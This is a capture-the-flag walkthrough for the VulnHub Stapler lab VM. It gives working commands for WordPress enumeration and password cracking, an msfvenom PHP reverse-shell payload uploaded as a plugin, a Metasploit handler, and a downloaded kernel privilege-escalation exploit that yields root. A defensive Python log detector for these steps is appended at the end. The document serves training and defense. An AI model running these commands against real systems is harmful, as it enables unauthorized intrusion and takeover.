Hack the Stapler VM (CTF Challenge)

In this article we will try to attack and gain root access to the Stapler: 1 challenge from VulnHub. The goal is reconnaissance, enumeration and exploitation of this vulnerable machine to get root access and read the contents of flag.txt. We have been told that there are various methods to do so, but we tried them and found the simplest way.
Download the Stapler VM from here
Penetrating Methodology:
·         Network Scanning (Nmap, netdiscover)
·         Enumeration (robots.txt)
·         WordPress scanning & password cracking (wpscan)
·         Login into WordPress
·         Generate PHP Backdoor (Msfvenom)
·         Upload and execute a backdoor
·         Reverse connection (Metasploit)
·         Import Python one-liner for a proper TTY shell
·         Kernel privilege escalation
·         Get Root access and capture the flag.

Start off by scanning the network to find our target. The command for it is:
netdiscover

We found our target: 192.168.1.126


To scan our target IP we will use an aggressive scan (-A) over all ports:
nmap -p- -A 192.168.1.126


The result shows us that ports 21, 22, 53, 80, 137, 139 and many others are open.


It also tells us about robots.txt, which has 2 disallowed entries, i.e. /admin112233 and /blogblog. Then we explored the target IP over port 80 but didn't find anything there.


So we tried opening it in the browser on port 12380.


We opened /blogblog/ but didn't find any clue for the next step here either.


Then we thought to explore https://192.168.1.126:12380/blogblog/, which brought up a new web page as shown below. Studying this blog we established that it is built on WordPress. The obvious next step is to use WPScan to learn all about the blog.


To run wpscan we came up with a 3-in-1 command that tells us about the themes and plugins as well as the usernames (the blog is served over HTTPS on port 12380 with a self-signed certificate, hence --disable-tls-checks):
wpscan --url https://192.168.1.126:12380/blogblog/ --enumerate at,ap,u --disable-tls-checks


It has dumped all the usernames that can log in; now we only need a password to log into WordPress.


By executing the command below you will get the password for John:
wpscan -u https://192.168.1.126:12380/blogblog/ --username John --wordlist /usr/share/wordlists/rockyou.txt --disable-tls-checks
As you can see, the password for user "john" is "incorrect"; now use these credentials to log into WordPress.


Once logged in, all we have to do is create the PHP code to upload, so that once it executes we get a session. To generate the code, type:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.132 lport=4444 -f raw
On the other side, run multi/handler inside the Metasploit framework.


Copy the code from the opening <?php tag to die() and save it in a file with a .php extension.
Now, as we are already logged in, go to the Plugins option, then select the Add Plugin option. Click the Browse option, select the PHP file in which you just saved the code, and click OK.


Now go to the upload directory and double-click the shell.php you just uploaded.


Meanwhile, return to the Metasploit terminal and wait for the meterpreter session opened by the multi/handler.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.132
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > exploit
From the image below you can observe Meterpreter session 1. But the task is not finished yet; we still need to go further for privilege escalation. Type:
sysinfo
Then, to get a proper TTY shell, we imported a Python one-liner by typing the following:
shell
python -c 'import pty;pty.spawn("/bin/bash")'
lsb_release -a


We now know that our target is running Ubuntu 16.04, so we searched for an exploit for it on exploit-db.com. Our search was successful and we found a suitable exploit, as shown below:


Now we need to move into a writable directory, and for that type:
cd /tmp
Then, to download the exploit, type:
wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip


The exploit is downloaded as a zip file, so unzip it by typing:
unzip 39772.zip
Enter the unzipped directory by typing:
ls
cd 39772
Now we have a tar file named exploit.tar. Extract it with the following command:
tar -xvf exploit.tar


Now use the ls command to view the directories. Then go into the doubleput exploit folder, and for that type:
cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh (compiles the exploit)
./doubleput (runs the compiled doubleput exploit)


cd /root (takes you into /root)
ls (shows you the contents of /root)
cat flag.txt
Note: This lab can be solved in multiple ways, because there is more than one method to hack it.
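From the defender's side, the two noisiest steps above are the wpscan password guessing against wp-login.php and the plugin upload followed by a request to the uploaded shell.php. The following Python script is an added example (not part of the original walkthrough) that flags both patterns in Apache-style access logs; the log lines, addresses and timestamps are constructed, while the upload-plugin endpoint path is WordPress's own.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-log lines modelled on the walkthrough's steps:
# wp-login.php password guessing, a plugin upload, then a request to shell.php.
SAMPLE_LOG = """\
192.168.1.132 - - [01/Jan/2020:10:00:00 +0000] "POST /blogblog/wp-login.php HTTP/1.1" 200 3901
192.168.1.132 - - [01/Jan/2020:10:00:00 +0000] "POST /blogblog/wp-login.php HTTP/1.1" 200 3901
192.168.1.132 - - [01/Jan/2020:10:00:01 +0000] "POST /blogblog/wp-login.php HTTP/1.1" 200 3901
192.168.1.132 - - [01/Jan/2020:10:00:02 +0000] "POST /blogblog/wp-login.php HTTP/1.1" 302 0
192.168.1.50 - - [01/Jan/2020:10:03:10 +0000] "POST /blogblog/wp-login.php HTTP/1.1" 302 0
192.168.1.132 - - [01/Jan/2020:10:05:00 +0000] "POST /blogblog/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5120
192.168.1.132 - - [01/Jan/2020:10:05:30 +0000] "GET /blogblog/wp-content/uploads/shell.php HTTP/1.1" 200 0
"""

# Captures ip, timestamp, method, path and status from a combined-format line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse(log_text):
    """Yield (ip, timestamp, method, path, status) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ip, ts, method, path, status = m.groups()
            yield ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def login_bursts(log_text, threshold=4, window_s=60):
    """IPs that POSTed to wp-login.php at least `threshold` times inside `window_s` seconds."""
    times = defaultdict(list)
    for ip, ts, method, path, _ in parse(log_text):
        if method == "POST" and path.endswith("/wp-login.php"):
            times[ip].append(ts)
    flagged = set()
    for ip, stamps in times.items():
        stamps.sort()
        # Sliding window: any `threshold` consecutive attempts inside the window is a burst.
        for i in range(len(stamps) - threshold + 1):
            if (stamps[i + threshold - 1] - stamps[i]).total_seconds() <= window_s:
                flagged.add(ip)
                break
    return flagged

def plugin_upload_then_php(log_text):
    """(ip, path) pairs where an IP uploaded a plugin and later fetched a .php file under wp-content."""
    uploaded, hits = set(), []
    for ip, _, method, path, _ in sorted(parse(log_text), key=lambda r: r[1]):
        if method == "POST" and "action=upload-plugin" in path:
            uploaded.add(ip)
        elif ip in uploaded and "/wp-content/" in path and path.split("?")[0].endswith(".php"):
            hits.append((ip, path))
    return hits
```

On the sample log, login_bursts(SAMPLE_LOG) returns only the guessing host and plugin_upload_then_php(SAMPLE_LOG) pairs that same host with the shell.php request, which is exactly the sequence a WordPress admin would want alerted on.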
